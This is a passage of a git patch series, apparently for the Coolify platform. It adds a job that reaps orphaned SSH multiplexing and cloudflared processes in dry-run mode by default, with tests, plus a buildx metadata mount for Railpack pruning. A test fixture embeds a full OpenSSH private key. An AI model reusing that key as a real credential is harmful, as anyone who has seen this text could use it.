+            if (! preg_match('#ControlPath=('.preg_quote($muxDir, '#').'/\S+)#', $process['args'], $pathMatch)) {
+                continue;
+            }
+
+            if ($process['etimes'] >= $minAge && ! file_exists($pathMatch[1])) {
+                $this->reapOrphan('ssh', $process);
+            }
+        }
+    }
+
+    /**
+     * Kill orphaned `cloudflared access ssh` proxy processes. Each is spawned
+     * as the SSH ProxyCommand transport for a Cloudflare Tunnel server and must
+     * die with its parent ssh. When that ssh is killed or orphaned (e.g. a lost
+     * mux master), the cloudflared process can leak and accumulate. A legitimate
+     * proxy always has a live ssh parent; one without is safe to reap.
+     *
+     * Processes younger than the minimum age are skipped so a proxy whose parent
+     * ssh is still starting up, or a transient `ssh -O check` proxy mid-exit, is
+     * never mistaken for an orphan.
+     */
+    private function cleanupOrphanedCloudflaredProcesses(): void
+    {
+        $minAge = (int) config('constants.ssh.mux_orphan_min_age');
+        $processes = $this->listProcesses();
+
+        $sshPids = [];
+        foreach ($processes as $process) {
+            // The ssh binary itself, not `cloudflared access ssh` (space before ssh).
+            if (preg_match('#(^|/)ssh\s#', $process['args'])) {
+                $sshPids[$process['pid']] = true;
+            }
+        }
+
+        foreach ($processes as $process) {
+            // `cloudflared access ssh`, never the `cloudflared tunnel` daemon.
+            if (! str_contains($process['args'], 'cloudflared access ssh')) {
+                continue;
+            }
+
+            // Orphaned when no live ssh process is its parent.
+            if ($process['etimes'] >= $minAge && ! isset($sshPids[$process['ppid']])) {
+                $this->reapOrphan('cloudflared', $process);
+            }
+        }
+    }
+
+    /**
+     * Reap a detected orphan process. When orphan reaping is disabled (the
+     * default), the orphan is only logged — a dry-run mode that lets operators
+     * verify what would be killed before enabling it for real.
+     *
+     * @param  array{pid: string, ppid: string, etimes: int, args: string}  $process
+     */
+    private function reapOrphan(string $kind, array $process): void
+    {
+        if (! config('constants.ssh.mux_orphan_reap_enabled')) {
+            Log::info("Orphaned {$kind} process detected (dry-run, not killed)", [
+                'pid' => $process['pid'],
+                'etimes' => $process['etimes'],
+                'command' => $process['args'],
+            ]);
+
+            return;
+        }
+
+        Process::run('kill '.escapeshellarg($process['pid']));
+        Log::info("Killed orphaned {$kind} process", [
+            'pid' => $process['pid'],
+            'etimes' => $process['etimes'],
+            'command' => $process['args'],
+        ]);
+    }
+
+    /**
+     * Snapshot of running processes.
+     *
+     * @return list<array{pid: string, ppid: string, etimes: int, args: string}>
+     */
+    private function listProcesses(): array
+    {
+        $ps = Process::run('ps -ww -eo pid=,ppid=,etimes=,args=');
+        if ($ps->exitCode() !== 0) {
+            return [];
+        }
+
+        $processes = [];
+        foreach (explode("\n", trim($ps->output())) as $line) {
+            if (! preg_match('/^\s*(\d+)\s+(\d+)\s+(\d+)\s+(.*)$/', $line, $matches)) {
+                continue;
+            }
+            $processes[] = [
+                'pid' => $matches[1],
+                'ppid' => $matches[2],
+                'etimes' => (int) $matches[3],
+                'args' => $matches[4],
+            ];
+        }
+
+        return $processes;
+    }
+
+    private function cleanupStaleConnections()
+    {
+        $muxFiles = Storage::disk('ssh-mux')->files();
+
+        foreach ($muxFiles as $muxFile) {
+            $serverUuid = $this->extractServerUuidFromMuxFile($muxFile);
+            $server = Server::where('uuid', $serverUuid)->first();
+
+            if (! $server) {
+                $this->removeMultiplexFile($muxFile, 'server_not_found');
+
+                continue;
+            }
+
+            $muxSocket = "/var/www/html/storage/app/ssh/mux/{$muxFile}";
+            $checkCommand = "ssh -O check -o ControlPath={$muxSocket} {$server->user}@{$server->ip} 2>/dev/null";
+            $checkProcess = Process::run($checkCommand);
+
+            if ($checkProcess->exitCode() !== 0) {
+                $this->removeMultiplexFile($muxFile, 'connection_check_failed');
+            } else {
+                $muxContent = Storage::disk('ssh-mux')->get($muxFile);
+                $establishedAt = Carbon::parse(substr($muxContent, 37));
+                $expirationTime = $establishedAt->addSeconds(config('constants.ssh.mux_persist_time'));
+
+                if (Carbon::now()->isAfter($expirationTime)) {
+                    $this->removeMultiplexFile($muxFile, 'expired');
+                }
+            }
+        }
+    }
+
+    private function cleanupNonExistentServerConnections()
+    {
+        $muxFiles = Storage::disk('ssh-mux')->files();
+        $existingServerUuids = Server::pluck('uuid')->toArray();
+
+        foreach ($muxFiles as $muxFile) {
+            $serverUuid = $this->extractServerUuidFromMuxFile($muxFile);
+            if (! in_array($serverUuid, $existingServerUuids)) {
+                $this->removeMultiplexFile($muxFile, 'server_does_not_exist');
+            }
+        }
+    }
+
+    private function extractServerUuidFromMuxFile($muxFile)
+    {
+        return substr($muxFile, 4);
+    }
+
+    /**
+     * Close and delete a stale mux socket file. When orphan reaping is disabled
+     * (the default), the file is only logged — a dry-run mode that lets operators
+     * verify what would be removed before enabling it for real.
+     */
+    private function removeMultiplexFile(string $muxFile, string $reason): void
+    {
+        if (! config('constants.ssh.mux_orphan_reap_enabled')) {
+            Log::info('Stale mux file detected (dry-run, not removed)', [
+                'file' => $muxFile,
+                'reason' => $reason,
+            ]);
+
+            return;
+        }
+
+        $muxSocket = "/var/www/html/storage/app/ssh/mux/{$muxFile}";
+        $closeCommand = "ssh -O exit -o ControlPath={$muxSocket} localhost 2>/dev/null";
+        Process::run($closeCommand);
+        Storage::disk('ssh-mux')->delete($muxFile);
+
+        Log::info('Removed stale mux file', [
+            'file' => $muxFile,
+            'reason' => $reason,
+        ]);
+    }
+}
diff --git a/app/Traits/SshRetryable.php b/app/Traits/SshRetryable.php
index 2092dc5f3..37303c7e6 100644
--- a/app/Traits/SshRetryable.php
+++ b/app/Traits/SshRetryable.php
@@ -40,6 +40,7 @@ protected function isRetryableSshError(string $errorOutput): bool
             'Remote host closed connection',
             'Authentication failed',
             'Too many authentication failures',
+            'SSH command failed with exit code: 255',
         ];
 
         $lowerErrorOutput = strtolower($errorOutput);
diff --git a/config/constants.php b/config/constants.php
index fd66a682a..a01669673 100644
--- a/config/constants.php
+++ b/config/constants.php
@@ -68,6 +68,13 @@
     'ssh' => [
         'mux_enabled' => env('MUX_ENABLED', env('SSH_MUX_ENABLED', true)),
         'mux_persist_time' => env('SSH_MUX_PERSIST_TIME', 3600),
+        'mux_health_check_enabled' => env('SSH_MUX_HEALTH_CHECK_ENABLED', true),
+        'mux_health_check_timeout' => env('SSH_MUX_HEALTH_CHECK_TIMEOUT', 5),
+        'mux_max_age' => env('SSH_MUX_MAX_AGE', 1800), // 30 minutes
+        'mux_lock_ttl' => env('SSH_MUX_LOCK_TTL', 30), // lock auto-release, seconds
+        'mux_lock_timeout' => env('SSH_MUX_LOCK_TIMEOUT', 10), // max wait for lock, seconds
+        'mux_orphan_min_age' => env('SSH_MUX_ORPHAN_MIN_AGE', 600), // min process age before reaping orphans, seconds
+        'mux_orphan_reap_enabled' => env('SSH_MUX_ORPHAN_REAP_ENABLED', false), // false = dry-run, only log orphans
         'connection_timeout' => 10,
         'server_interval' => 20,
         'command_timeout' => 3600,
diff --git a/tests/Feature/ScheduleOnOneServerTest.php b/tests/Feature/ScheduleOnOneServerTest.php
index 10758738c..167d16bfa 100644
--- a/tests/Feature/ScheduleOnOneServerTest.php
+++ b/tests/Feature/ScheduleOnOneServerTest.php
@@ -21,6 +21,18 @@
     expect($event->onOneServer)->toBeTrue();
 });
 
+it('schedules ssh mux cleanup locally on every scheduler host', function () {
+    $schedule = app(Schedule::class);
+
+    $event = collect($schedule->events())->first(
+        fn ($e) => (string) $e->description === 'cleanup:ssh-mux'
+    );
+
+    expect($event)->not->toBeNull();
+    expect($event->onOneServer)->toBeFalse();
+    expect($event->getSummaryForDisplay())->toBe('cleanup:ssh-mux');
+});
+
 it('schedules every production job with onOneServer', function () {
     $schedule = app(Schedule::class);
 
diff --git a/tests/Feature/SshMultiplexingLockTest.php b/tests/Feature/SshMultiplexingLockTest.php
index b914765f6..f06e50c1a 100644
--- a/tests/Feature/SshMultiplexingLockTest.php
+++ b/tests/Feature/SshMultiplexingLockTest.php
@@ -1,17 +1,19 @@
 <?php
 
 use App\Helpers\SshMultiplexingHelper;
+use App\Jobs\CleanupStaleMultiplexedConnections;
 use App\Models\PrivateKey;
 use App\Models\Server;
 use App\Models\User;
 use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Facades\Cache;
+use Illuminate\Support\Facades\File;
 use Illuminate\Support\Facades\Process;
 use Illuminate\Support\Facades\Storage;
 
 /**
- * SSH multiplexing now relies on OpenSSH's native lazy ControlMaster handling.
- * Coolify should add mux options to real ssh/scp commands, but must not pre-warm
- * background masters with separate `ssh -fN` processes.
+ * Tests for the explicit per-server mux lock that prevents concurrent workers
+ * from racing on initial ControlMaster creation.
  */
 uses(RefreshDatabase::class);
 
@@ -20,12 +22,18 @@ function makeMuxServer(): Server
     $user = User::factory()->create();
     $team = $user->teams()->first();
 
-    $privateKeyContent = "-----BEGIN OPENSSH PRIVATE KEY-----\n".
-        "b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW\n".
-        "QyNTUxOQAAACBbhpqHhqv6aI67Mj9abM3DVbmcfYhZAhC7ca4d9UCevAAAAJi/QySHv0Mk\n".
-        "hwAAAAtzc2gtZWQyNTUxOQAAACBbhpqHhqv6aI67Mj9abM3DVbmcfYhZAhC7ca4d9UCevA\n".
-        "AAAECBQw4jg1WRT2IGHMncCiZhURCts2s24HoDS0thHnnRKVuGmoeGq/pojrsyP1pszcNV\n".
-        "uZx9iFkCELtxrh31QJ68AAAAEXNhaWxANzZmZjY2ZDJlMmRkAQIDBA==\n".
+    $privateKeyContent = '-----BEGIN OPENSSH PRIVATE KEY-----
+'.
+        'b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
+'.
+        'QyNTUxOQAAACBbhpqHhqv6aI67Mj9abM3DVbmcfYhZAhC7ca4d9UCevAAAAJi/QySHv0Mk
+'.
+        'hwAAAAtzc2gtZWQyNTUxOQAAACBbhpqHhqv6aI67Mj9abM3DVbmcfYhZAhC7ca4d9UCevA
+'.
+        'AAAECBQw4jg1WRT2IGHMncCiZhURCts2s24HoDS0thHnnRKVuGmoeGq/pojrsyP1pszcNV
+'.
+        'uZx9iFkCELtxrh31QJ68AAAAEXNhaWxANzZmZjY2ZDJlMmRkAQIDBA==
+'.
         '-----END OPENSSH PRIVATE KEY-----';
 
     $privateKey = PrivateKey::create([
@@ -37,87 +45,92 @@ function makeMuxServer(): Server
     Storage::fake('ssh-keys');
     Storage::disk('ssh-keys')->put("ssh_key@{$privateKey->uuid}", $privateKeyContent);
 
-    return Server::factory()->create([
+    $server = Server::factory()->create([
         'team_id' => $team->id,
         'private_key_id' => $privateKey->id,
     ]);
+
+    Storage::disk('ssh-keys')->put("ssh_key@{$server->privateKey->uuid}", $server->privateKey->private_key);
+
+    return $server;
 }
 
-it('does not prewarm a background ssh master', function () {
+it('establishes a master with ssh -fN and never the orphan-prone ssh -fNM', function () {
     config(['constants.ssh.mux_enabled' => true]);
     $server = makeMuxServer();
 
-    Process::fake();
+    Process::fake([
+        '*-O check*' => Process::result(exitCode: 1),
+        '*-fN *' => Process::result(exitCode: 0),
+    ]);
 
     expect(SshMultiplexingHelper::ensureMultiplexedConnection($server))->toBeTrue();
 
-    Process::assertNothingRan();
+    Process::assertRan(fn ($process) => str_contains($process->command, 'ssh -fN ')
+        && ! str_contains($process->command, 'ssh -fNM'));
 });
 
-it('adds native openssh multiplexing options to ssh commands', function () {
-    config(['constants.ssh.mux_enabled' => true]);
-    $server = makeMuxServer();
-    Storage::disk('ssh-keys')->put("ssh_key@{$server->privateKey->uuid}", $server->privateKey->private_key);
-
-    Process::fake();
-
-    $command = SshMultiplexingHelper::generateSshCommand($server, 'echo ok');
-
-    expect($command)
-        ->toContain('-o ControlMaster=auto')
-        ->toContain("-o ControlPath=/var/www/html/storage/app/ssh/mux/mux_{$server->uuid}")
-        ->toContain('-o ControlPersist=3600')
-        ->not->toContain('-O check')
-        ->not->toContain('ssh -fN');
-
-    Process::assertNothingRan();
-});
-
-it('can generate terminal ssh commands without a hard command timeout', function () {
-    config(['constants.ssh.mux_enabled' => true]);
-    $server = makeMuxServer();
-    Storage::disk('ssh-keys')->put("ssh_key@{$server->privateKey->uuid}", $server->privateKey->private_key);
-
-    $command = SshMultiplexingHelper::generateSshCommand($server, 'echo ok', commandTimeout: 0);
-
-    expect($command)
-        ->toStartWith('ssh ')
-        ->not->toStartWith('timeout ')
-        ->not->toContain('timeout 3600 ssh');
-});
-
-it('omits native multiplexing options when ssh multiplexing is disabled for a command', function () {
-    config(['constants.ssh.mux_enabled' => true]);
-    $server = makeMuxServer();
-    Storage::disk('ssh-keys')->put("ssh_key@{$server->privateKey->uuid}", $server->privateKey->private_key);
-
-    $command = SshMultiplexingHelper::generateSshCommand($server, 'echo ok', disableMultiplexing: true);
-
-    expect($command)
-        ->not->toContain('-o ControlMaster=auto')
-        ->not->toContain('-o ControlPath=')
-        ->not->toContain('-o ControlPersist=');
-});
-
-it('adds native openssh multiplexing options to scp commands', function () {
-    config(['constants.ssh.mux_enabled' => true]);
+it('reuses an existing healthy master without spawning a new one', function () {
+    config([
+        'constants.ssh.mux_enabled' => true,
+        'constants.ssh.mux_health_check_enabled' => true,
+    ]);
     $server = makeMuxServer();
 
-    Process::fake();
+    Process::fake([
+        '*-O check*' => Process::result(exitCode: 0),
+        '*health_check_ok*' => Process::result(output: 'health_check_ok', exitCode: 0),
+    ]);
 
-    $command = SshMultiplexingHelper::generateScpCommand($server, '/tmp/source', '/tmp/dest');
+    expect(SshMultiplexingHelper::ensureMultiplexedConnection($server))->toBeTrue();
 
-    expect($command)
-        ->toContain('-o ControlMaster=auto')
-        ->toContain("-o ControlPath=/var/www/html/storage/app/ssh/mux/mux_{$server->uuid}")
-        ->toContain('-o ControlPersist=3600')
-        ->not->toContain('-O check')
-        ->not->toContain('ssh -fN');
-
-    Process::assertNothingRan();
+    Process::assertNotRan(fn ($process) => str_contains($process->command, 'ssh -fN'));
 });
 
-it('returns false and runs no process when multiplexing is globally disabled', function () {
+it('refreshes an expired master before reuse', function () {
+    config([
+        'constants.ssh.mux_enabled' => true,
+        'constants.ssh.mux_health_check_enabled' => false,
+        'constants.ssh.mux_max_age' => 10,
+    ]);
+    $server = makeMuxServer();
+    Cache::put("ssh_mux_connection_time_{$server->uuid}", time() - 30, 3600);
+
+    Process::fake([
+        '*-O check*' => Process::result(exitCode: 0),
+        '*-O exit*' => Process::result(exitCode: 0),
+        '*-fN *' => Process::result(exitCode: 0),
+    ]);
+
+    expect(SshMultiplexingHelper::ensureMultiplexedConnection($server))->toBeTrue();
+
+    Process::assertRan(fn ($process) => str_contains($process->command, 'ssh -O exit'));
+    Process::assertRan(fn ($process) => str_contains($process->command, 'ssh -fN '));
+});
+
+it('does not spawn a master when the per-server lock is already held', function () {
+    config([
+        'constants.ssh.mux_enabled' => true,
+        'constants.ssh.mux_lock_timeout' => 0,
+    ]);
+    $server = makeMuxServer();
+
+    Process::fake([
+        '*-O check*' => Process::result(exitCode: 1),
+    ]);
+
+    $lockKey = 'ssh_mux_lock_'.(gethostname() ?: 'unknown').'_'.$server->uuid;
+    $held = Cache::lock($lockKey, 30);
+    expect($held->get())->toBeTrue();
+
+    expect(SshMultiplexingHelper::ensureMultiplexedConnection($server))->toBeFalse();
+
+    Process::assertNotRan(fn ($process) => str_contains($process->command, 'ssh -fN '));
+
+    $held->release();
+});
+
+it('returns false and runs no ssh when multiplexing is disabled', function () {
     config(['constants.ssh.mux_enabled' => false]);
     $server = makeMuxServer();
 
@@ -127,3 +140,182 @@ function makeMuxServer(): Server
 
     Process::assertNothingRan();
 });
+
+it('adds mux options to ssh commands only after the explicit master is ready', function () {
+    config(['constants.ssh.mux_enabled' => true]);
+    $server = makeMuxServer();
+
+    Process::fake([
+        '*-O check*' => Process::result(exitCode: 1),
+        '*-fN *' => Process::result(exitCode: 0),
+    ]);
+
+    $command = SshMultiplexingHelper::generateSshCommand($server, 'echo ok');
+
+    expect($command)
+        ->toContain('-o ControlMaster=auto')
+        ->toContain("-o ControlPath=/var/www/html/storage/app/ssh/mux/mux_{$server->uuid}")
+        ->toContain('-o ControlPersist=3600')
+        ->toContain("'bash -se' << \\")
+        ->not->toContain('<< $delimiter');
+
+    Process::assertRan(fn ($process) => str_contains($process->command, 'ssh -fN '));
+});
+
+it('can generate terminal ssh commands without a hard command timeout', function () {
+    config(['constants.ssh.mux_enabled' => false]);
+    $server = makeMuxServer();
+
+    $command = SshMultiplexingHelper::generateSshCommand($server, 'echo ok', commandTimeout: 0);
+
+    expect($command)
+        ->toStartWith('ssh ')
+        ->not->toStartWith('timeout ')
+        ->not->toContain('timeout 3600 ssh');
+});
+
+it('omits multiplexing options and setup when disabled for a command', function () {
+    config(['constants.ssh.mux_enabled' => true]);
+    $server = makeMuxServer();
+
+    Process::fake();
+
+    $command = SshMultiplexingHelper::generateSshCommand($server, 'echo ok', disableMultiplexing: true);
+
+    expect($command)
+        ->not->toContain('-o ControlMaster=auto')
+        ->not->toContain('-o ControlPath=')
+        ->not->toContain('-o ControlPersist=');
+
+    Process::assertNothingRan();
+});
+
+it('adds mux options to scp commands only after the explicit master is ready', function () {
+    config(['constants.ssh.mux_enabled' => true]);
+    $server = makeMuxServer();
+
+    Process::fake([
+        '*-O check*' => Process::result(exitCode: 1),
+        '*-fN *' => Process::result(exitCode: 0),
+    ]);
+
+    $command = SshMultiplexingHelper::generateScpCommand($server, '/tmp/source', '/tmp/dest');
+
+    expect($command)
+        ->toContain('-o ControlMaster=auto')
+        ->toContain("-o ControlPath=/var/www/html/storage/app/ssh/mux/mux_{$server->uuid}")
+        ->toContain('-o ControlPersist=3600');
+
+    Process::assertRan(fn ($process) => str_contains($process->command, 'ssh -fN '));
+});
+
+it('kills only old orphaned ssh masters whose control socket no longer exists', function () {
+    config(['constants.ssh.mux_orphan_reap_enabled' => true]);
+    $muxDir = storage_path('app/ssh/mux');
+    File::ensureDirectoryExists($muxDir);
+
+    $liveSocket = $muxDir.'/mux_live_'.uniqid();
+    $orphanSocket = $muxDir.'/mux_orphan_'.uniqid();
+    $youngSocket = $muxDir.'/mux_young_'.uniqid();
+    File::put($liveSocket, 'x');
+
+    Process::fake([
+        'ps*' => Process::result(output: "111 1 5000 ssh -fN -o ControlMaster=auto -o ControlPath={$liveSocket} root@1.2.3.4
+".
+            "222 1 5000 ssh -fN -o ControlMaster=auto -o ControlPath={$orphanSocket} root@1.2.3.4
+".
+            "333 1 30 ssh -fN -o ControlMaster=auto -o ControlPath={$youngSocket} root@1.2.3.4
+"),
+        'kill*' => Process::result(exitCode: 0),
+    ]);
+
+    $job = new CleanupStaleMultiplexedConnections;
+    $method = new ReflectionMethod($job, 'cleanupOrphanedSshProcesses');
+    $method->setAccessible(true);
+    $method->invoke($job);
+
+    Process::assertRan(fn ($process) => str_contains($process->command, 'kill') && str_contains($process->command, '222'));
+    Process::assertNotRan(fn ($process) => str_contains($process->command, 'kill') && str_contains($process->command, '111'));
+    Process::assertNotRan(fn ($process) => str_contains($process->command, 'kill') && str_contains($process->command, '333'));
+
+    File::delete($liveSocket);
+});
+
+it('kills only old orphaned cloudflared proxies whose parent ssh is gone', function () {
+    config(['constants.ssh.mux_orphan_reap_enabled' => true]);
+
+    Process::fake([
+        'ps*' => Process::result(output: '100 1 5000 ssh -fN -o ControlMaster=auto root@1.2.3.4
+'.
+            '200 100 5000 cloudflared access ssh --hostname host.example.com
+'.
+            '300 2176 5000 cloudflared access ssh --hostname host.example.com
+'.
+            '400 2176 30 cloudflared access ssh --hostname host.example.com
+'.
+            '2176 1 9000 /usr/bin/some-supervisor
+'),
+        'kill*' => Process::result(exitCode: 0),
+    ]);
+
+    $job = new CleanupStaleMultiplexedConnections;
+    $method = new ReflectionMethod($job, 'cleanupOrphanedCloudflaredProcesses');
+    $method->setAccessible(true);
+    $method->invoke($job);
+
+    Process::assertRan(fn ($process) => str_contains($process->command, 'kill') && str_contains($process->command, '300'));
+    Process::assertNotRan(fn ($process) => str_contains($process->command, 'kill') && str_contains($process->command, '200'));
+    Process::assertNotRan(fn ($process) => str_contains($process->command, 'kill') && str_contains($process->command, '400'));
+});
+
+it('dry-run mode logs orphans but kills nothing when reaping is disabled', function () {
+    config(['constants.ssh.mux_orphan_reap_enabled' => false]);
+    $muxDir = storage_path('app/ssh/mux');
+    File::ensureDirectoryExists($muxDir);
+
+    $orphanSocket = $muxDir.'/mux_orphan_'.uniqid();
+
+    Process::fake([
+        'ps*' => Process::result(output: "222 1 5000 ssh -fN -o ControlMaster=auto -o ControlPath={$orphanSocket} root@1.2.3.4
+"),
+        'kill*' => Process::result(exitCode: 0),
+    ]);
+
+    $job = new CleanupStaleMultiplexedConnections;
+    $method = new ReflectionMethod($job, 'cleanupOrphanedSshProcesses');
+    $method->setAccessible(true);
+    $method->invoke($job);
+
+    Process::assertNotRan(fn ($process) => str_contains($process->command, 'kill'));
+});
+
+it('removes mux files for non-existent servers when reaping is enabled', function () {
+    config(['constants.ssh.mux_orphan_reap_enabled' => true]);
+    Storage::fake('ssh-mux');
+    $file = 'mux_ghost'.uniqid();
+    Storage::disk('ssh-mux')->put($file, 'x');
+    Process::fake();
+
+    $job = new CleanupStaleMultiplexedConnections;
+    $method = new ReflectionMethod($job, 'cleanupNonExistentServerConnections');
+    $method->setAccessible(true);
+    $method->invoke($job);
+
+    expect(Storage::disk('ssh-mux')->exists($file))->toBeFalse();
+});
+
+it('keeps mux files for non-existent servers in dry-run mode', function () {
+    config(['constants.ssh.mux_orphan_reap_enabled' => false]);
+    Storage::fake('ssh-mux');
+    $file = 'mux_ghost'.uniqid();
+    Storage::disk('ssh-mux')->put($file, 'x');
+    Process::fake();
+
+    $job = new CleanupStaleMultiplexedConnections;
+    $method = new ReflectionMethod($job, 'cleanupNonExistentServerConnections');
+    $method->setAccessible(true);
+    $method->invoke($job);
+
+    expect(Storage::disk('ssh-mux')->exists($file))->toBeTrue();
+    Process::assertNothingRan();
+});
diff --git a/tests/Unit/SshRetryMechanismTest.php b/tests/Unit/SshRetryMechanismTest.php
index 23e1b867f..62b25b9fc 100644
--- a/tests/Unit/SshRetryMechanismTest.php
+++ b/tests/Unit/SshRetryMechanismTest.php
@@ -10,12 +10,12 @@ class SshRetryMechanismTest extends TestCase
 {
     public function test_ssh_retry_handler_exists()
     {
-        $this->assertTrue(class_exists(\App\Helpers\SshRetryHandler::class));
+        $this->assertTrue(class_exists(SshRetryHandler::class));
     }
 
     public function test_ssh_retryable_trait_exists()
     {
-        $this->assertTrue(trait_exists(\App\Traits\SshRetryable::class));
+        $this->assertTrue(trait_exists(SshRetryable::class));
     }
 
     public function test_retry_on_ssh_connection_errors()
@@ -50,6 +50,24 @@ public function test_is_retryable_ssh_error($error)
         }
     }
 
+    public function test_generic_ssh_exit_255_error_is_retryable()
+    {
+        $handler = new class
+        {
+            use SshRetryable;
+
+            // Make methods public for testing
+            public function test_is_retryable_ssh_error($error)
+            {
+                return $this->isRetryableSshError($error);
+            }
+        };
+
+        $this->assertTrue(
+            $handler->test_is_retryable_ssh_error('SSH command failed with exit code: 255')
+        );
+    }
+
     public function test_non_ssh_errors_are_not_retryable()
     {
         $handler = new class
@@ -141,6 +159,32 @@ function () use (&$attemptCount) {
         $this->assertEquals(3, $attemptCount);
     }
 
+    public function test_retry_succeeds_after_generic_ssh_exit_255_failure()
+    {
+        $attemptCount = 0;
+
+        config([
+            'constants.ssh.max_retries' => 3,
+            'constants.ssh.retry_base_delay' => 0,
+        ]);
+
+        $result = SshRetryHandler::retry(
+            function () use (&$attemptCount) {
+                $attemptCount++;
+                if ($attemptCount === 1) {
+                    throw new \RuntimeException('SSH command failed with exit code: 255');
+                }
+
+                return 'success';
+            },
+            ['test' => 'generic_ssh_255_retry_test'],
+            true
+        );
+
+        $this->assertEquals('success', $result);
+        $this->assertEquals(2, $attemptCount);
+    }
+
     public function test_retry_fails_after_max_attempts()
     {
         $attemptCount = 0;

From 5eec212ade7bd413df3133ed78cb629dfa49d03b Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 14:30:49 +0200
Subject: [PATCH 79/90] fix(deploy): persist Railpack buildx metadata

Mount the host buildx metadata directory into helper containers so the
Railpack builder can be pruned during Docker cleanup.
---
 app/Actions/Server/CleanupDocker.php                  |  2 +-
 app/Jobs/ApplicationDeploymentJob.php                 |  8 +++++---
 tests/Unit/Actions/Server/CleanupDockerTest.php       |  8 ++++++++
 ...pplicationDeploymentRailpackBuildxMetadataTest.php | 11 +++++++++++
 4 files changed, 25 insertions(+), 4 deletions(-)
 create mode 100644 tests/Unit/ApplicationDeploymentRailpackBuildxMetadataTest.php

diff --git a/app/Actions/Server/CleanupDocker.php b/app/Actions/Server/CleanupDocker.php
index 33558c746..45514e601 100644
--- a/app/Actions/Server/CleanupDocker.php
+++ b/app/Actions/Server/CleanupDocker.php
@@ -51,7 +51,7 @@ public function handle(Server $server, bool $deleteUnusedVolumes = false, bool $
             'docker container prune -f --filter "label=coolify.managed=true" --filter "label!=coolify.proxy=true" --filter "label!=coolify.type=database" --filter "label!=coolify.type=application" --filter "label!=coolify.type=service"',
             $imagePruneCmd,
             'docker builder prune -af',
-            'docker buildx prune --builder coolify-railpack -af 2>/dev/null || true',
+            'BUILDX_CONFIG=$HOME/.docker/buildx docker buildx prune --builder coolify-railpack -af 2>/dev/null || true',
             "docker images --filter before=$helperImageWithVersion --filter reference=$helperImage | grep $helperImage | awk '{print $3}' | xargs -r docker rmi -f",
             "docker images --filter before=$realtimeImageWithVersion --filter reference=$realtimeImage | grep $realtimeImage | awk '{print $3}' | xargs -r docker rmi -f",
             "docker images --filter before=$helperImageWithoutPrefixVersion --filter reference=$helperImageWithoutPrefix | grep $helperImageWithoutPrefix | awk '{print $3}' | xargs -r docker rmi -f",
diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index a1478aaff..d6a842397 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -2129,21 +2129,23 @@ private function prepare_builder_image(bool $firstTry = true)
         $helperImage = "{$helperImage}:".getHelperVersion();
         // Get user home directory
         $this->serverUserHomeDir = instant_remote_process(['echo $HOME'], $this->server);
+        instant_remote_process(["mkdir -p {$this->serverUserHomeDir}/.docker/buildx"], $this->server);
         $this->dockerConfigFileExists = instant_remote_process(["test -f {$this->serverUserHomeDir}/.docker/config.json && echo 'OK' || echo 'NOK'"], $this->server);
 
         $env_flags = $this->generate_docker_env_flags_for_secrets();
+        $buildxMetadataVolume = "-v {$this->serverUserHomeDir}/.docker/buildx:/root/.docker/buildx";
         if ($this->use_build_server) {
             if ($this->dockerConfigFileExists === 'NOK') {
                 throw new DeploymentException('Docker config file (~/.docker/config.json) not found on the build server. Please run "docker login" to login to the docker registry on the server.');
             }
-            $runCommand = "docker run -d --name {$this->deployment_uuid} {$env_flags} --rm -v {$this->serverUserHomeDir}/.docker/config.json:/root/.docker/config.json:ro -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
+            $runCommand = "docker run -d --name {$this->deployment_uuid} {$env_flags} --rm -v {$this->serverUserHomeDir}/.docker/config.json:/root/.docker/config.json:ro {$buildxMetadataVolume} -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
         } else {
             if ($this->dockerConfigFileExists === 'OK') {
                 $safeNetwork = escapeshellarg($this->destination->network);
-                $runCommand = "docker run -d --network {$safeNetwork} --name {$this->deployment_uuid} {$env_flags} --rm -v {$this->serverUserHomeDir}/.docker/config.json:/root/.docker/config.json:ro -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
+                $runCommand = "docker run -d --network {$safeNetwork} --name {$this->deployment_uuid} {$env_flags} --rm -v {$this->serverUserHomeDir}/.docker/config.json:/root/.docker/config.json:ro {$buildxMetadataVolume} -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
             } else {
                 $safeNetwork = escapeshellarg($this->destination->network);
-                $runCommand = "docker run -d --network {$safeNetwork} --name {$this->deployment_uuid} {$env_flags} --rm -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
+                $runCommand = "docker run -d --network {$safeNetwork} --name {$this->deployment_uuid} {$env_flags} --rm {$buildxMetadataVolume} -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
             }
         }
         if ($firstTry) {
diff --git a/tests/Unit/Actions/Server/CleanupDockerTest.php b/tests/Unit/Actions/Server/CleanupDockerTest.php
index 1a6a0d3d6..a0439f34f 100644
--- a/tests/Unit/Actions/Server/CleanupDockerTest.php
+++ b/tests/Unit/Actions/Server/CleanupDockerTest.php
@@ -447,6 +447,14 @@
     expect($sourceFile)->toContain('label=coolify.managed=true');
 });
 
+it('uses persisted buildx metadata when pruning the railpack builder', function () {
+    $sourceFile = file_get_contents(__DIR__.'/../../../../app/Actions/Server/CleanupDocker.php');
+
+    expect($sourceFile)
+        ->toContain('BUILDX_CONFIG=$HOME/.docker/buildx docker buildx prune --builder coolify-railpack -af')
+        ->not->toContain('--buildkitd-flags');
+});
+
 it('preserves build image for currently running tag', function () {
     $images = collect([
         ['repository' => 'app-uuid', 'tag' => 'commit1', 'created_at' => '2024-01-01 10:00:00', 'image_ref' => 'app-uuid:commit1'],
diff --git a/tests/Unit/ApplicationDeploymentRailpackBuildxMetadataTest.php b/tests/Unit/ApplicationDeploymentRailpackBuildxMetadataTest.php
new file mode 100644
index 000000000..70b021f0a
--- /dev/null
+++ b/tests/Unit/ApplicationDeploymentRailpackBuildxMetadataTest.php
@@ -0,0 +1,11 @@
+<?php
+
